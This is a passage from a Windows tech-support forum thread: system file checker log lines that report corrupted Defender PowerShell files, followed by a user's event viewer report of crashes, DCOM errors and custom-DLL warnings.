2019-11-26 17:58:47, Info                  CSI    000058ca [SR] Verify complete
2019-11-26 17:58:47, Info                  CSI    000058cb [SR] Verifying 100 components
2019-11-26 17:58:47, Info                  CSI    000058cc [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:49, Info                  CSI    00005931 [SR] Verify complete
2019-11-26 17:58:49, Info                  CSI    00005932 [SR] Verifying 100 components
2019-11-26 17:58:49, Info                  CSI    00005933 [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:51, Info                  CSI    00005998 [SR] Verify complete
2019-11-26 17:58:52, Info                  CSI    00005999 [SR] Verifying 100 components
2019-11-26 17:58:52, Info                  CSI    0000599a [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:55, Info                  CSI    00005a49 [SR] Verify complete
2019-11-26 17:58:55, Info                  CSI    00005a4a [SR] Verifying 100 components
2019-11-26 17:58:55, Info                  CSI    00005a4b [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:58, Info                  CSI    00005ab8 [SR] Verify complete
2019-11-26 17:58:58, Info                  CSI    00005ab9 [SR] Verifying 100 components
2019-11-26 17:58:58, Info                  CSI    00005aba [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:00, Info                  CSI    00005b24 [SR] Verify complete
2019-11-26 17:59:00, Info                  CSI    00005b25 [SR] Verifying 100 components
2019-11-26 17:59:00, Info                  CSI    00005b26 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:02, Info                  CSI    00005b8b [SR] Verify complete
2019-11-26 17:59:02, Info                  CSI    00005b8c [SR] Verifying 100 components
2019-11-26 17:59:02, Info                  CSI    00005b8d [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:04, Info                  CSI    00005bf4 [SR] Verify complete
2019-11-26 17:59:04, Info                  CSI    00005bf5 [SR] Verifying 100 components
2019-11-26 17:59:04, Info                  CSI    00005bf6 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:07, Info                  CSI    00005c5b [SR] Verify complete
2019-11-26 17:59:07, Info                  CSI    00005c5c [SR] Verifying 100 components
2019-11-26 17:59:07, Info                  CSI    00005c5d [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:10, Info                  CSI    00005ccd [SR] Verify complete
2019-11-26 17:59:10, Info                  CSI    00005cce [SR] Verifying 100 components
2019-11-26 17:59:10, Info                  CSI    00005ccf [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:12, Info                  CSI    00005d36 [SR] Verify complete
2019-11-26 17:59:13, Info                  CSI    00005d37 [SR] Verifying 100 components
2019-11-26 17:59:13, Info                  CSI    00005d38 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:15, Info                  CSI    00005d9f [SR] Verify complete
2019-11-26 17:59:15, Info                  CSI    00005da0 [SR] Verifying 100 components
2019-11-26 17:59:15, Info                  CSI    00005da1 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:17, Info                  CSI    00005e0e [SR] Verify complete
2019-11-26 17:59:17, Info                  CSI    00005e0f [SR] Verifying 100 components
2019-11-26 17:59:17, Info                  CSI    00005e10 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:19, Info                  CSI    00005e75 [SR] Verify complete
2019-11-26 17:59:20, Info                  CSI    00005e76 [SR] Verifying 100 components
2019-11-26 17:59:20, Info                  CSI    00005e77 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:22, Info                  CSI    00005ee5 [SR] Verify complete
2019-11-26 17:59:22, Info                  CSI    00005ee6 [SR] Verifying 100 components
2019-11-26 17:59:22, Info                  CSI    00005ee7 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:24, Info                  CSI    00005f53 [SR] Verify complete
2019-11-26 17:59:25, Info                  CSI    00005f54 [SR] Verifying 100 components
2019-11-26 17:59:25, Info                  CSI    00005f55 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:27, Info                  CSI    00005fba [SR] Verify complete
2019-11-26 17:59:27, Info                  CSI    00005fbb [SR] Verifying 100 components
2019-11-26 17:59:27, Info                  CSI    00005fbc [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:29, Info                  CSI    00006022 [SR] Verify complete
2019-11-26 17:59:30, Info                  CSI    00006023 [SR] Verifying 100 components
2019-11-26 17:59:30, Info                  CSI    00006024 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:32, Info                  CSI    0000608b [SR] Verify complete
2019-11-26 17:59:32, Info                  CSI    0000608c [SR] Verifying 100 components
2019-11-26 17:59:32, Info                  CSI    0000608d [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:34, Info                  CSI    000060f2 [SR] Verify complete
2019-11-26 17:59:34, Info                  CSI    000060f3 [SR] Verifying 100 components
2019-11-26 17:59:34, Info                  CSI    000060f4 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:39, Info                  CSI    0000617a [SR] Verify complete
2019-11-26 17:59:39, Info                  CSI    0000617b [SR] Verifying 100 components
2019-11-26 17:59:39, Info                  CSI    0000617c [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:41, Info                  CSI    000061fe [SR] Verify complete
2019-11-26 17:59:42, Info                  CSI    000061ff [SR] Verifying 100 components
2019-11-26 17:59:42, Info                  CSI    00006200 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:44, Info                  CSI    00006265 [SR] Verify complete
2019-11-26 17:59:44, Info                  CSI    00006266 [SR] Verifying 100 components
2019-11-26 17:59:44, Info                  CSI    00006267 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:47, Info                  CSI    000062fc [SR] Verify complete
2019-11-26 17:59:47, Info                  CSI    000062fd [SR] Verifying 100 components
2019-11-26 17:59:47, Info                  CSI    000062fe [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:50, Info                  CSI    00006363 [SR] Verify complete
2019-11-26 17:59:50, Info                  CSI    00006364 [SR] Verifying 100 components
2019-11-26 17:59:50, Info                  CSI    00006365 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:53, Info                  CSI    000063ca [SR] Verify complete
2019-11-26 17:59:53, Info                  CSI    000063cb [SR] Verifying 100 components
2019-11-26 17:59:53, Info                  CSI    000063cc [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:55, Info                  CSI    0000644f [SR] Verify complete
2019-11-26 17:59:55, Info                  CSI    00006450 [SR] Verifying 100 components
2019-11-26 17:59:55, Info                  CSI    00006451 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:58, Info                  CSI    000064be [SR] Verify complete
2019-11-26 17:59:58, Info                  CSI    000064bf [SR] Verifying 100 components
2019-11-26 17:59:58, Info                  CSI    000064c0 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:00, Info                  CSI    00006527 [SR] Verify complete
2019-11-26 18:00:00, Info                  CSI    00006528 [SR] Verifying 100 components
2019-11-26 18:00:00, Info                  CSI    00006529 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:02, Info                  CSI    0000658e [SR] Verify complete
2019-11-26 18:00:02, Info                  CSI    0000658f [SR] Verifying 100 components
2019-11-26 18:00:02, Info                  CSI    00006590 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:04, Info                  CSI    000065f5 [SR] Verify complete
2019-11-26 18:00:04, Info                  CSI    000065f6 [SR] Verifying 100 components
2019-11-26 18:00:04, Info                  CSI    000065f7 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:06, Info                  CSI    0000665c [SR] Verify complete
2019-11-26 18:00:06, Info                  CSI    0000665d [SR] Verifying 100 components
2019-11-26 18:00:06, Info                  CSI    0000665e [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:08, Info                  CSI    000066c3 [SR] Verify complete
2019-11-26 18:00:09, Info                  CSI    000066c4 [SR] Verifying 100 components
2019-11-26 18:00:09, Info                  CSI    000066c5 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:11, Info                  CSI    0000672a [SR] Verify complete
2019-11-26 18:00:11, Info                  CSI    0000672b [SR] Verifying 100 components
2019-11-26 18:00:11, Info                  CSI    0000672c [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:13, Info                  CSI    00006791 [SR] Verify complete
2019-11-26 18:00:13, Info                  CSI    00006792 [SR] Verifying 100 components
2019-11-26 18:00:13, Info                  CSI    00006793 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:15, Info                  CSI    000067f8 [SR] Verify complete
2019-11-26 18:00:15, Info                  CSI    000067f9 [SR] Verifying 12 components
2019-11-26 18:00:15, Info                  CSI    000067fa [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:16, Info                  CSI    00006807 [SR] Verify complete
2019-11-26 18:00:16, Info                  CSI    00006808 [SR] Repairing 2 components
2019-11-26 18:00:16, Info                  CSI    00006809 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:16, Info                  CSI    0000680b [SR] Cannot repair member file [l:26]'MSFT_MpThreatCatalog.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000680d [SR] Cannot repair member file [l:13]'Defender.psd1' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000680f [SR] Cannot repair member file [l:20]'MSFT_MpWDOScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006811 [SR] Cannot repair member file [l:22]'MSFT_MpSignature.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006813 [SR] Cannot repair member file [l:19]'MSFT_MpThreat.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006815 [SR] Cannot repair member file [l:27]'MSFT_MpComputerStatus.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006817 [SR] Cannot repair member file [l:17]'MSFT_MpScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006819 [SR] Cannot repair member file [l:28]'MSFT_MpThreatDetection.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000681b [SR] Cannot repair member file [l:23]'MSFT_MpPreference.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000681d [SR] Cannot repair member file [l:12]'OneDrive.lnk' of Microsoft-Windows-OneDrive-Setup, version 10.0.17134.1, arch Host= amd64 Guest= x86, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006820 [SR] Cannot repair member file [l:26]'MSFT_MpThreatCatalog.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006821 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006823 [SR] Cannot repair member file [l:13]'Defender.psd1' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006824 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006826 [SR] Cannot repair member file [l:20]'MSFT_MpWDOScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006827 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006829 [SR] Cannot repair member file [l:22]'MSFT_MpSignature.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000682a [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    0000682c [SR] Cannot repair member file [l:19]'MSFT_MpThreat.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000682d [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    0000682f [SR] Cannot repair member file [l:27]'MSFT_MpComputerStatus.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006830 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006832 [SR] Cannot repair member file [l:17]'MSFT_MpScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006833 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006835 [SR] Cannot repair member file [l:28]'MSFT_MpThreatDetection.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006836 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006838 [SR] Cannot repair member file [l:23]'MSFT_MpPreference.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006839 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    0000683c [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpComputerStatus.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    0000683f [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreat.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006842 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreatCatalog.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006845 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreatDetection.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006848 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpPreference.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    0000684b [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpScan.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    0000684e [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpWDOScan.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006851 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpSignature.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006854 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\Defender.psd1; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006858 [SR] Cannot repair member file [l:12]'OneDrive.lnk' of Microsoft-Windows-OneDrive-Setup, version 10.0.17134.1, arch Host= amd64 Guest= x86, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006859 [SR] This component was referenced by [l:116]'Microsoft-Windows-OneDrive-Setup-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.f647690e04ff7e43581b577deaab5f78'
2019-11-26 18:00:16, Info                  CSI    0000685b [SR] Could not reproject corrupted file \??\C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\\OneDrive.lnk; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    0000685d [SR] Repair complete
2019-11-26 18:00:16, Info                  CSI    0000685e [SR] Committing transaction
2019-11-26 18:00:16, Info                  CSI    00006863 [SR] Verify and Repair Transaction completed. All files and registry keys listed in this transaction  have been successfully repaired
 


  • 0

#13
spra

spra

    Member

  • Topic Starter
  • Member
  • PipPip
  • 78 posts

First result by VEW:

 

Vino's Event Viewer v01c run on Windows 7 in English
Report run at 26/11/2019 18:06:14

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 26/11/2019 11:49:39
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 26/11/2019 11:39:13
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 25/11/2019 16:39:44
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 25/11/2019 10:53:43
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 26/11/2019 15:50:09
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscDataProtection  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 15:50:09
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscBrokerManager  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 15:48:09
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {D63B10C5-BB46-4990-A94F-E40B9D520160}  and APPID  {9CA88EE3-ACB7-47C8-AFC4-AB702511C276}  to the user NT AUTHORITY\NETWORK SERVICE SID (S-1-5-20) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 15:47:39
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 15:47:39
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 15:47:39
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 15:47:39
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 11:51:48
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscDataProtection  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 11:51:48
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscBrokerManager  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 11:41:22
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscDataProtection  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 11:41:22
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscBrokerManager  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 11:38:55
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 11:38:55
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 11:38:55
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 25/11/2019 21:47:47
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 25/11/2019 21:47:47
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 25/11/2019 21:47:47
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 25/11/2019 21:47:46
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 25/11/2019 19:24:04
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscDataProtection  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 25/11/2019 19:24:04
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscBrokerManager  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 26/11/2019 15:49:13
Type: Warning Category: 0
Event: 8021 Source: BROWSER
The browser service was unable to retrieve a list of servers from the browser master \\MIXPC on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\MIXPC  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 26/11/2019 15:48:15
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 26/11/2019 11:51:31
Type: Warning Category: 0
Event: 8021 Source: BROWSER
The browser service was unable to retrieve a list of servers from the browser master \\MIXPC on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\MIXPC  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 26/11/2019 11:49:54
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 26/11/2019 11:40:41
Type: Warning Category: 0
Event: 8021 Source: BROWSER
The browser service was unable to retrieve a list of servers from the browser master \\MIXPC on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\MIXPC  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 26/11/2019 11:39:28
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 26/11/2019 07:40:05
Type: Warning Category: 0
Event: 8021 Source: BROWSER
The browser service was unable to retrieve a list of servers from the browser master \\MIXPC on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\MIXPC  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 25/11/2019 19:38:40
Type: Warning Category: 0
Event: 8021 Source: BROWSER
